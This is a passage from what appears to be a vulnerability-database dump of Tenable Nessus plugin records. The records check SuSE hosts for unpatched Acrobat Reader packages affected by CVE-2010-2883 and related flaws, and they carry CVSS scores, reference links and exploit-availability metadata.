value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-971\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread_ja-9.4-0.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:09:49", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code. (CVE-2010-2883 / CVE-2010-2884 /\nCVE-2010-2887 / CVE-2010-2889 / CVE-2010-2890 / CVE-2010-3619 /\nCVE-2010-3620 / CVE-2010-3621 / CVE-2010-3622 / CVE-2010-3623 /\nCVE-2010-3624 / CVE-2010-3625 / CVE-2010-3626 / CVE-2010-3627 /\nCVE-2010-3628 / CVE-2010-3629 / CVE-2010-3630 / CVE-2010-3631 /\nCVE-2010-3632 / CVE-2010-3656 / CVE-2010-3657 / CVE-2010-3658)", "edition": 23, "published": "2010-12-02T00:00:00", "title": "SuSE 11 / 11.1 Security Update : acroread_ja (SAT Patch Numbers 3272 / 3273)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2887", "CVE-2010-3621", "CVE-2010-2890", "CVE-2010-3658", "CVE-2010-2884", "CVE-2010-2883", "CVE-2010-3624", "CVE-2010-3630", "CVE-2010-3629", "CVE-2010-3657", "CVE-2010-3622", "CVE-2010-2889", "CVE-2010-3625", "CVE-2010-3620", "CVE-2010-3656", "CVE-2010-3619", "CVE-2010-3626", "CVE-2010-3623", "CVE-2010-3631", "CVE-2010-3628", "CVE-2010-3632", "CVE-2010-3627"], "modified": "2010-12-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:acroread_ja", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_ACROREAD_JA-101007.NASL", "href": "https://www.tenable.com/plugins/nessus/50888", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50888);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-2883\", \"CVE-2010-2884\", \"CVE-2010-2887\", \"CVE-2010-2889\", \"CVE-2010-2890\", \"CVE-2010-3619\", \"CVE-2010-3620\", \"CVE-2010-3621\", \"CVE-2010-3622\", \"CVE-2010-3623\", \"CVE-2010-3624\", \"CVE-2010-3625\", \"CVE-2010-3626\", \"CVE-2010-3627\", \"CVE-2010-3628\", \"CVE-2010-3629\", \"CVE-2010-3630\", \"CVE-2010-3631\", \"CVE-2010-3632\", \"CVE-2010-3656\", \"CVE-2010-3657\", \"CVE-2010-3658\");\n\n script_name(english:\"SuSE 11 / 11.1 Security Update : acroread_ja (SAT Patch Numbers 3272 / 3273)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code. (CVE-2010-2883 / CVE-2010-2884 /\nCVE-2010-2887 / CVE-2010-2889 / CVE-2010-2890 / CVE-2010-3619 /\nCVE-2010-3620 / CVE-2010-3621 / CVE-2010-3622 / CVE-2010-3623 /\nCVE-2010-3624 / CVE-2010-3625 / CVE-2010-3626 / CVE-2010-3627 /\nCVE-2010-3628 / CVE-2010-3629 / CVE-2010-3630 / CVE-2010-3631 /\nCVE-2010-3632 / CVE-2010-3656 / CVE-2010-3657 / CVE-2010-3658)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=638466\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2883.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2884.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2887.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2889.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2890.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3619.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3620.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3621.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3622.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3623.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3624.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3625.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3626.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3627.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3628.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3629.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3630.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3631.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3632.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3656.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3657.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3658.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 3272 / 3273 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-971\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread_ja\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread_ja-9.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread_ja-9.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:09:43", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code. (CVE-2010-2883 / CVE-2010-2884 /\nCVE-2010-2887 / CVE-2010-2889 / CVE-2010-2890 / CVE-2010-3619 /\nCVE-2010-3620 / CVE-2010-3621 / CVE-2010-3622 / CVE-2010-3623 /\nCVE-2010-3624 / CVE-2010-3625 / CVE-2010-3626 / CVE-2010-3627 /\nCVE-2010-3628 / CVE-2010-3629 / CVE-2010-3630 / CVE-2010-3631 /\nCVE-2010-3632 / CVE-2010-3656 / CVE-2010-3657 / CVE-2010-3658)", "edition": 23, "published": "2010-12-02T00:00:00", "title": "SuSE 11 / 11.1 Security Update : Acrobat Reader (SAT Patch Numbers 3268 / 3270)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2887", "CVE-2010-3621", "CVE-2010-2890", "CVE-2010-3658", "CVE-2010-2884", "CVE-2010-2883", "CVE-2010-3624", "CVE-2010-3630", "CVE-2010-3629", "CVE-2010-3657", "CVE-2010-3622", "CVE-2010-2889", "CVE-2010-3625", "CVE-2010-3620", "CVE-2010-3656", "CVE-2010-3619", "CVE-2010-3626", "CVE-2010-3623", "CVE-2010-3631", "CVE-2010-3628", "CVE-2010-3632", "CVE-2010-3627"], "modified": "2010-12-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:acroread-fonts-ja", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_CN", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-ko", "p-cpe:/a:novell:suse_linux:11:acroread-cmaps", "p-cpe:/a:novell:suse_linux:11:acroread", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_TW"], "id": "SUSE_11_ACROREAD-101007.NASL", "href": "https://www.tenable.com/plugins/nessus/50884", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50884);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-2883\", \"CVE-2010-2884\", \"CVE-2010-2887\", \"CVE-2010-2889\", \"CVE-2010-2890\", \"CVE-2010-3619\", \"CVE-2010-3620\", \"CVE-2010-3621\", \"CVE-2010-3622\", \"CVE-2010-3623\", \"CVE-2010-3624\", \"CVE-2010-3625\", \"CVE-2010-3626\", \"CVE-2010-3627\", \"CVE-2010-3628\", \"CVE-2010-3629\", \"CVE-2010-3630\", \"CVE-2010-3631\", \"CVE-2010-3632\", \"CVE-2010-3656\", \"CVE-2010-3657\", \"CVE-2010-3658\");\n\n script_name(english:\"SuSE 11 / 11.1 Security Update : Acrobat Reader (SAT Patch Numbers 3268 / 3270)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code. (CVE-2010-2883 / CVE-2010-2884 /\nCVE-2010-2887 / CVE-2010-2889 / CVE-2010-2890 / CVE-2010-3619 /\nCVE-2010-3620 / CVE-2010-3621 / CVE-2010-3622 / CVE-2010-3623 /\nCVE-2010-3624 / CVE-2010-3625 / CVE-2010-3626 / CVE-2010-3627 /\nCVE-2010-3628 / CVE-2010-3629 / CVE-2010-3630 / CVE-2010-3631 /\nCVE-2010-3632 / CVE-2010-3656 / CVE-2010-3657 / CVE-2010-3658)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=638466\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2883.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2884.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2887.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2889.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2890.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3619.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3620.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3621.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3622.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3623.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3624.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3625.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3626.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3627.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3628.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3629.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3630.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3631.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3632.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3656.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3657.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3658.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 3268 / 3270 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-971\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-9.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-cmaps-9.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-fonts-ja-9.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-fonts-ko-9.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-fonts-zh_CN-9.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-fonts-zh_TW-9.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"acroread-cmaps-9.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"acroread-fonts-ja-9.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"acroread-fonts-ko-9.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"acroread-fonts-zh_CN-9.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"acroread-fonts-zh_TW-9.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread-9.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread-cmaps-9.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread-fonts-ja-9.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread-fonts-ko-9.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread-fonts-zh_CN-9.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread-fonts-zh_TW-9.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"acroread-cmaps-9.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"acroread-fonts-ja-9.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"acroread-fonts-ko-9.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"acroread-fonts-zh_CN-9.4-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"acroread-fonts-zh_TW-9.4-0.1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:42:58", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code. (CVE-2010-2883 / CVE-2010-2884 /\nCVE-2010-2887 / CVE-2010-2889 / CVE-2010-2890 / CVE-2010-3619 /\nCVE-2010-3620 / CVE-2010-3621 / CVE-2010-3622 / CVE-2010-3623 /\nCVE-2010-3624 / CVE-2010-3625 / CVE-2010-3626 / CVE-2010-3627 /\nCVE-2010-3628 / CVE-2010-3629 / CVE-2010-3630 / CVE-2010-3631 /\nCVE-2010-3632 / CVE-2010-3656 / CVE-2010-3657 / CVE-2010-3658)", "edition": 23, "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : Acrobat Reader (ZYPP Patch Number 7181)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2887", "CVE-2010-3621", "CVE-2010-2890", "CVE-2010-3658", "CVE-2010-2884", "CVE-2010-2883", "CVE-2010-3624", "CVE-2010-3630", "CVE-2010-3629", "CVE-2010-3657", "CVE-2010-3622", "CVE-2010-2889", "CVE-2010-3625", "CVE-2010-3620", "CVE-2010-3656", "CVE-2010-3619", "CVE-2010-3626", "CVE-2010-3623", "CVE-2010-3631", "CVE-2010-3628", "CVE-2010-3632", "CVE-2010-3627"], "modified": "2011-01-27T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_ACROREAD-7181.NASL", "href": "https://www.tenable.com/plugins/nessus/51703", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51703);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-2883\", \"CVE-2010-2884\", \"CVE-2010-2887\", \"CVE-2010-2889\", \"CVE-2010-2890\", \"CVE-2010-3619\", \"CVE-2010-3620\", \"CVE-2010-3621\", \"CVE-2010-3622\", \"CVE-2010-3623\", \"CVE-2010-3624\", \"CVE-2010-3625\", \"CVE-2010-3626\", \"CVE-2010-3627\", \"CVE-2010-3628\", \"CVE-2010-3629\", \"CVE-2010-3630\", \"CVE-2010-3631\", \"CVE-2010-3632\", \"CVE-2010-3656\", \"CVE-2010-3657\", \"CVE-2010-3658\");\n\n script_name(english:\"SuSE 10 Security Update : Acrobat Reader (ZYPP Patch Number 7181)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code. (CVE-2010-2883 / CVE-2010-2884 /\nCVE-2010-2887 / CVE-2010-2889 / CVE-2010-2890 / CVE-2010-3619 /\nCVE-2010-3620 / CVE-2010-3621 / CVE-2010-3622 / CVE-2010-3623 /\nCVE-2010-3624 / CVE-2010-3625 / CVE-2010-3626 / CVE-2010-3627 /\nCVE-2010-3628 / CVE-2010-3629 / CVE-2010-3630 / CVE-2010-3631 /\nCVE-2010-3632 / CVE-2010-3656 / CVE-2010-3657 / CVE-2010-3658)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2883.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2884.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2887.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2889.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2890.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3619.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3620.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3621.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3622.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3623.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3624.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 